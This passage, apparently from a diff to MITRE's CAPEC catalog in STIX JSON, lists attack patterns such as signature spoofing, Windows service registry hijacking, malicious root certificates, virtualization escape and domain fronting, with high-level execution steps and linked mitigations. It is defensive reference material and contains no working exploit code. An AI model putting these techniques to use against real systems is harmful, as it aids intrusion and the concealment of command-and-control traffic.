known trusted certificate authority, but which was in fact not signed by that certificate authority. Windows checks the public key and other curve parameters, but not the (bespoke adversary-supplied) base point generator (G) parameter constant which actually generated the curve\" [REF-562]. Exploiting this vulnerability allows the adversary to leverage a spoofed certificate to dupe trusted network connections and deliver/execute malicious code, while appearing as legitimately trusted entity [REF-563]. This ultimately tricks the victim into believing the malicious website or executable is legitimate and originates from a properly verified source. See also: CVE-2020-0601" + ], + "x_capec_extended_description": "\n Signature verification algorithms are generally used to determine whether a certificate or piece of code (e.g. executable, binary, etc.) possesses a valid signature and can be trusted.\n If the leveraged algorithm confirms that a valid signature exists, it establishes a foundation of trust that is further conveyed to the end-user when interacting with a website or application. However, if the signature verification algorithm improperly validates the signature, either by not validating the signature at all or by failing to fully validate the signature, it could result in an adversary generating a spoofed signature and being classified as a legitimate entity. Successfully exploiting such a weakness could further allow the adversary to reroute users to malicious sites, steals files, activates microphones, records keystrokes and passwords, wipes disks, installs malware, and more.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient's application accepts the use of keys generated using cryptographically weak signature verification algorithms." + ], + "x_capec_skills_required": { + "High": "Reverse engineering and cryptanalysis of signature verification algorithm implementation" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use programs and products that contain cryptographic elements that have been thoroughly tested for flaws in the signature verification routines.", + "id": "course-of-action--c68612c7-a3bf-4a0e-8416-0cc58982766d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-475-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca2272d5-9269-4fa1-9964-f2d6d45c271c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c68612c7-a3bf-4a0e-8416-0cc58982766d", + "spec_version": "2.1", + "target_ref": "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.", + "external_references": [ + { + "external_id": "CAPEC-476", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/476.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Eric Johanson, The state of homograph attacks, 2005--02---11, http://www.shmoo.com/idn/homograph.txt", + "external_id": "REF-414", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Signature Spoofing by Misrepresentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Recipient is using signature verification software that does not clearly indicate potential homographs in the signer identity.Recipient is using signature verification software that contains a parsing vulnerability, or allows control characters in the signer identity field, such that a signature is mistakenly displayed as valid and from a known or authoritative signer." + ], + "x_capec_skills_required": { + "High": "Attacker may be required to create malformed data blobs and know how to insert them in a location that the recipient will visit." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the application is using parsing and data display techniques that will accurately display control characters, international symbols and markings, and ultimately recognize potential homograph attacks.", + "id": "course-of-action--694ab70c-12fd-45fd-8fa9-0806c5da0396", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-476-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--82379432-2b82-4aca-a835-238f54a057ef", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--694ab70c-12fd-45fd-8fa9-0806c5da0396", + "spec_version": "2.1", + "target_ref": "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.", + "external_references": [ + { + "external_id": "CAPEC-477", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/477.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + } + ], + "id": "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Signature Spoofing by Mixing Signed and Unsigned Content", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Signer and recipient are using complex data storage structures that allow for a mix between signed and unsigned data", + "Recipient is using signature verification software that does not maintain separation between signed and unsigned data once the signature has been verified." + ], + "x_capec_skills_required": { + "High": "Attacker must be able to create malformed data blobs and know how to insert them in a location that the recipient will visit." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the application is fully patched and does not allow the processing of unsigned data as if it is signed data.", + "id": "course-of-action--f9df8e0c-94b6-4847-ad19-ece4cc20afe0", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-477-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6679a0b9-deee-47e3-81d3-9d55d39d9207", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9df8e0c-94b6-4847-ad19-ece4cc20afe0", + "spec_version": "2.1", + "target_ref": "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.", + "external_references": [ + { + "external_id": "CAPEC-478", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/478.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Hijack Execution Flow:Service Registry Permissions Weakness", + "external_id": "T1574.011", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/011" + }, + { + "description": "Create or Modify System Process:Windows Service", + "external_id": "T1543.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/003" + } + ], + "id": "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Modification of Windows Service Configuration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands (By altering specific configuration settings for the service, the adversary could run arbitrary code to be executed.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target system: The adversary must first determine the system they wish to modify the registry of. This needs to be a windows machine as this attack only works on the windows registry.

Experiment

  1. Gain access to the system: The adversary needs to gain access to the system in some way so that they can modify the windows registry.

    2. Techniques
    Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked.
    Gain remote access to a system through a variety of means.

Exploit

  1. Modify windows registry: The adversary will modify the windows registry by changing the configuration settings for a service. Specifically, the adversary will change the path settings to define a path to a malicious binary to be executed.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the capability to write to the Windows Registry on the targeted system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Usable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.", + "id": "course-of-action--25c25dbf-033d-40de-8314-255ce51d1e3d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-478-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--defdb513-7363-40a3-a5c5-41ca51464c89", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--25c25dbf-033d-40de-8314-255ce51d1e3d", + "spec_version": "2.1", + "target_ref": "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-26T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.", + "external_references": [ + { + "external_id": "CAPEC-479", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/479.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Subvert Trust Controls:Install Root Certificate", + "external_id": "T1553.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/004" + } + ], + "id": "attack-pattern--a35eb10e-1168-4c77-8f46-87fa6ee40ef7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Malicious Root Certificate", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the ability to create a new root certificate." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on client side code to access local files and resources instead of URLs. When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser's authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks.", + "external_references": [ + { + "external_id": "CAPEC-48", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/48.html" + }, + { + "external_id": "CWE-241", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/241.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Core Concepts: Attack Patterns", + "external_id": "REF-416", + "source_name": "reference_from_CAPEC", + "url": "https://websec.io/2012/11/26/Core-Concepts-Attack-Patterns.html" + } + ], + "id": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Passing Local Filenames to Functions That Expect a URL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n J2EE applications frequently use .properties files to store configuration information including JDBC connections, LDAP connection strings, proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains\n hibernate.connection.driver_class = org.postgresql.Driverhibernate.connection.url = jdbc:postgresql://localhost/mydatabasehibernate.connection.username = usernamehibernate.connection.password = passwordhibernate.c3p0.min_size=5hibernate.c3p0.max_size=20\n Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify web application URL inputs: Review application inputs to find those that are designed to be URLs.

    2. Techniques
    Manually navigate web site pages to identify URLs.
    Use automated tools to identify URLs.

Experiment

  1. Identify URL inputs allowing local access.: Execute test local commands via each URL input to determine which are successful.

    2. Techniques
    Manually execute a local command (such as 'pwd') via the URL inputs.
    Using an automated tool, test each URL input for weakness.

Exploit

  1. Execute malicious commands: Using the identified URL inputs that allow local command execution, execute malicious commands.

    2. Techniques
    Execute local commands via the URL input.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The victim's software must not differentiate between the location and type of reference passed the client software, e.g. browser" + ], + "x_capec_skills_required": { + "Medium": "Attacker identifies known local files to exploit" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all configuration files and resource are either removed or protected when promoting code into production.", + "id": "course-of-action--536001f7-8712-4a06-82c7-2a5e7008aa72", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-48-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a9b80a78-9847-4310-b5a4-59689e59d949", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--536001f7-8712-4a06-82c7-2a5e7008aa72", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--840a14c4-8158-43a5-9dbf-7913a86a244f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cf36118d-637c-4216-a672-9f18e372b78c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3cc7fae-f66b-4499-8930-bca7d098c80c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2e8384c4-b7dc-49d2-990a-83e058990579", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains access to an application, service, or device with the privileges of an authorized or privileged user by escaping the confines of a virtualized environment. The adversary is then able to access resources or execute unauthorized code within the host environment, generally with the privileges of the user running the virtualized process. Successfully executing an attack of this type is often the first step in executing more complex attacks.", + "external_references": [ + { + "external_id": "CAPEC-480", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/480.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Escape to Host", + "external_id": "T1611", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1611" + } + ], + "id": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Escaping Virtualization", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The adversary probes the target application, service, or device to find a possible weakness that would allow escaping the virtualized environment.

    2. Techniques
    Probing applications, services, or devices for virtualization weaknesses.

Experiment

  1. Verify the exploitable security weaknesses: Using the found weakness, the adversary attempts to escape the virtualized environment.

    2. Techniques
    Using an application weakness to escape a virtualized environment

Exploit

  1. Execute more complex attacks: Once outside of the virtualized environment, the adversary attempts to perform other more complex attacks such as accessing system resources or executing unauthorized code within the host environment.

    2. Techniques
    Executing complex attacks when given higher permissions by escaping a virtualized environment
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure virtualization software is current and up-to-date.", + "id": "course-of-action--f7d97bf5-f247-488c-9be8-811a887b8cfd", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-480-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2cbe557-9342-4193-a6f9-e79a120bbc41", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7d97bf5-f247-488c-9be8-811a887b8cfd", + "spec_version": "2.1", + "target_ref": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Abide by the least privilege principle to avoid assigning users more privileges than necessary.", + "id": "course-of-action--bf819a99-45a3-4059-8c63-366a7fb34b88", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-480-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2bfc97de-cce3-45f4-b6d9-b32d60e99c84", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf819a99-45a3-4059-8c63-366a7fb34b88", + "spec_version": "2.1", + "target_ref": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries can provide contradictory destinations when sending messages. Traffic is routed in networks using the domain names in various headers available at different levels of the OSI model. In a Content Delivery Network (CDN) multiple domains might be available, and if there are contradictory domain names provided it is possible to route traffic to an inappropriate destination. The technique, called Domain Fronting, involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. An alternative technique, called Domainless Fronting, is similar, but the SNI field is left blank.", + "external_references": [ + { + "external_id": "CAPEC-481", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/481.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Proxy:Domain Fronting", + "external_id": "T1090.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1090/004" + } + ], + "id": "attack-pattern--4733a63a-db36-49fa-8eba-3d5eddfe7f87", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Contradictory Destinations in Traffic Routing Schemes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary must be aware that their message will be routed using a CDN, and that both of the contradictory domains are served from that CDN.", + "If the purpose of the Domain Fronting is to hide redirected C2 traffic, the C2 server must have been created in the CDN." + ], + "x_capec_skills_required": { + "Medium": "The adversary must have some knowledge of how messages are routed." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor connections, checking headers in traffic for contradictory domain names, or empty domain names.", + "id": "course-of-action--2769b76e-88f2-4e7c-9ebb-32ab919d5fee", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-481-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32b657af-ab17-46cd-9717-b3b289f2f295", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2769b76e-88f2-4e7c-9ebb-32ab919d5fee", + "spec_version": "2.1", + "target_ref": "attack-pattern--4733a63a-db36-49fa-8eba-3d5eddfe7f87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. This often involves the use of TCP SYN messages.", + "external_references": [ + { + "external_id": "CAPEC-482", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/482.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Endpoint Denial of 